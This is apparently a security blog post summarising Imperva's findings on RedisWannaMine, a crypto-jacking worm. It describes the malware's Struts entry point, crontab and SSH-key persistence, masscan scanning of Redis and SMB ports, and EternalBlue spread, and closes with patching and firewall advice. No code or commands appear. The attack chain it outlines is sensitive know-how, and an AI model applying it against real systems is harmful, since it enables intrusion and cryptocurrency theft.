Last week, Imperva discovered a new crypto-jacking attack, which they named RedisWannaMine. According to Imperva, the malware’s initial attack vector used a well-known web application vulnerability involving Apache Struts, affecting both database servers and application servers. Imperva, however, does not reveal the scope or numbers of vulnerable systems that have been exploited. Imperva noted that most crypto-jackings thus far have been limited in their complexity, but this new attack uses a downloader that is more sophisticated. Specifically, it is more complex in both evasion techniques and capability and demonstrates a worm-like behavior exploiting the NSA EternalBlue SMB vulnerabilities together with other advanced exploits.
Imperva discovered several scripts associated with RedisWannaMine. One shell script they found, transfer.sh, was a downloader that in some ways resembled older crypto-jacking downloaders seen before. The script gains persistency in the infected host through new entry in crontab and gains remote access to the machine through a new SSH key entry in “/root/.ssh/authorized_key” and new entries in the system iptables firewall.
This downloader has many improvements over previously seen crypto-jacker downloaders though. For example, it is self-sufficient. It can install multiple packages using Linux-standard package managers such as APT and YUM. The script also downloads a publicly available TCP port scanning tool called masscan from the Github repository and then compiles and installs it on the infected host. Per the GitHub project document, masscan is “the fastest Internet port scanner tool. It can scan the entire Internet in under 6 minutes, transmitting 10 million packets per second.”
According to the research, once the malware gets settled on the host, the script then launches another process that uses the masscan tool to discover and infect publicly available Redis servers. The tool scans for TCP port 6379 both on public and private IPs. If any of the IP addresses scanned is publicly available, the script then launches the ‘redisrun.sh’ script to infect the new host with the same crypto-mining malware and repeats the trend.
RedisWannaMine also uses the EternalBlue SMB exploits against vulnerable Windows servers. The malware process launches another scan process called ‘ebscan.sh’ that again uses the masscan tool, this time for TCP port 445 on both private and public IPs to discover and infect publicly available Windows servers running vulnerable SMB versions.
According to the Imperva blog post, the miner uses a well-known crypto-miner malware to mine cryptocurrency and funnel it to the hacker-owned wallet.
How do you prevent RedisWannaMine?
There are several ways to prevent RedisWannaMine from infecting your servers. At a minimum, install system updates and properly patch applications with the latest security updates. Making sure vulnerable protocols like old SMB versions are disabled in your network and using firewalls to restrict access so that servers like Redis are not exposed to the world can go a long way, too. For more information on this particular attack, you can view Imperva’s blog here. –Abdi Hagi